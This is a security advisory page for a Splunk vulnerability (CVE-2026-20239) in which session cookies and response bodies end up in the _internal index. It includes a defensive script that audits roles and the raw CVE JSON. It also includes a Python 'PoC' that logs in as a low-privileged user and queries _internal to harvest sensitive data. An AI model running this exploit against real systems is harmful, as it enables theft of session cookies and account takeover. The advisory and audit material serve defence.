Security Vulnerability Report
CVE-2026-20239 CVSS 7.5 HIGH

CVE-2026-20239

Published: 2026-05-20 18:16:27
Last Modified: 2026-05-20 18:16:27

Description

In Splunk Enterprise versions below 10.2.2 and 10.0.5, and Splunk Cloud Platform versions below 10.3.2512.8, 10.2.2510.11, 10.1.2507.21, and 10.0.2503.13, a user with a role that has access to the `_internal` index could view session cookies and response bodies that contain sensitive data.
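
The precondition above is role-based access to `_internal`. As an added defender-side check (example code, not from the advisory and not Splunk's own tooling), the following script reads a Splunk `authorize.conf` fragment and lists every role that can search `_internal`, either directly, through a wildcard such as `*` or `_*`, or inherited via `importRoles`; it assumes the conventional `[role_<name>]` stanza layout with `;`-separated values, and the conf fragment is a constructed sample.

```python
import configparser
import fnmatch

# Constructed sample authorize.conf fragment (not taken from any real deployment).
SAMPLE_AUTHORIZE_CONF = """
[role_admin]
srchIndexesAllowed = *;_*
[role_user]
srchIndexesAllowed = main;_internal
[role_analyst]
importRoles = user
srchIndexesAllowed = security
[role_reader]
srchIndexesAllowed = main;web
"""

def parse_roles(text):
    """Map role name -> {'indexes': [...], 'imports': [...]} from [role_*] stanzas."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text)
    roles = {}
    for section in cp.sections():
        if not section.startswith("role_"):
            continue
        roles[section[len("role_"):]] = {  # both values are ';'-separated lists
            "indexes": [i.strip() for i in cp[section].get("srchIndexesAllowed", "").split(";") if i.strip()],
            "imports": [r.strip() for r in cp[section].get("importRoles", "").split(";") if r.strip()],
        }
    return roles

def effective_indexes(roles, name, seen=None):
    """Index patterns a role can search, including those inherited via importRoles."""
    if seen is None:
        seen = set()
    if name in seen or name not in roles:  # guards against import cycles / unknown parents
        return set()
    seen.add(name)
    allowed = set(roles[name]["indexes"])
    for parent in roles[name]["imports"]:
        allowed |= effective_indexes(roles, parent, seen)
    return allowed

def roles_with_index(text, index="_internal"):
    """Roles whose effective allow-list matches `index`; wildcards such as * and _* count."""
    roles = parse_roles(text)
    return sorted(r for r in roles
                  if any(fnmatch.fnmatchcase(index, p) for p in effective_indexes(roles, r)))

if __name__ == "__main__":
    print(roles_with_index(SAMPLE_AUTHORIZE_CONF))  # ['admin', 'analyst', 'user']
```

Roles reported here that are not administrative are the ones to review against the patched versions listed in this advisory; note that `analyst` appears only because it inherits `_internal` from `user`.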

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Splunk Enterprise < 10.2.2
Splunk Enterprise < 10.0.5
Splunk Cloud Platform < 10.3.2512.8
Splunk Cloud Platform < 10.2.2510.11
Splunk Cloud Platform < 10.1.2507.21
Splunk Cloud Platform < 10.0.2503.13

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
PoC for CVE-2026-20239
Demonstrates searching for sensitive data in _internal index.
"""
import requests
import json

# Configuration
SPLUNK_HOST = "https://<target-splunk-host>:8089"
USERNAME = "low_priv_user"
PASSWORD = "user_password"
SEARCH_QUERY = 'search index=_internal (sourcetype="splunkd" OR sourcetype="splunk_web_access") | head 100'


def get_session_key():
    """Authenticate and get session key."""
    url = f"{SPLUNK_HOST}/services/auth/login"
    data = {'username': USERNAME, 'password': PASSWORD, 'output_mode': 'json'}
    # Disable SSL verification for testing purposes only
    response = requests.post(url, data=data, verify=False)
    if response.status_code == 200:
        return response.json().get('sessionKey')
    return None


def search_sensitive_data(session_key):
    """Execute search on _internal index."""
    url = f"{SPLUNK_HOST}/services/search/jobs"
    headers = {'Authorization': f'Splunk {session_key}'}
    data = {'search': SEARCH_QUERY, 'output_mode': 'json'}
    response = requests.post(url, headers=headers, data=data, verify=False)
    if response.status_code == 201:
        print("[+] Search job created successfully.")
        # In a real scenario, you would poll for results using the SID
        print(f"[+] Response: {response.text}")
    else:
        print(f"[-] Failed to create search job: {response.status_code}")


if __name__ == "__main__":
    key = get_session_key()
    if key:
        search_sensitive_data(key)
    else:
        print("[-] Authentication failed.")
```

References

https://advisory.splunk.com/advisories/SVD-2026-0503 (Splunk advisory SVD-2026-0503)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-20239",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-20T18:16:26.520",
    "lastModified": "2026-05-20T18:16:26.520",
    "vulnStatus": "Received",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "In Splunk Enterprise versions below 10.2.2 and 10.0.5, and Splunk Cloud Platform versions below 10.3.2512.8, 10.2.2510.11, 10.1.2507.21, and 10.0.2503.13, a user with a role that has access to the `_internal` index could view session cookies and response bodies that contain sensitive data."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.6,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [{"lang": "en", "value": "CWE-532"}]
      }
    ],
    "references": [
      {
        "url": "https://advisory.splunk.com/advisories/SVD-2026-0503",
        "source": "[email protected]"
      }
    ]
  }
}
```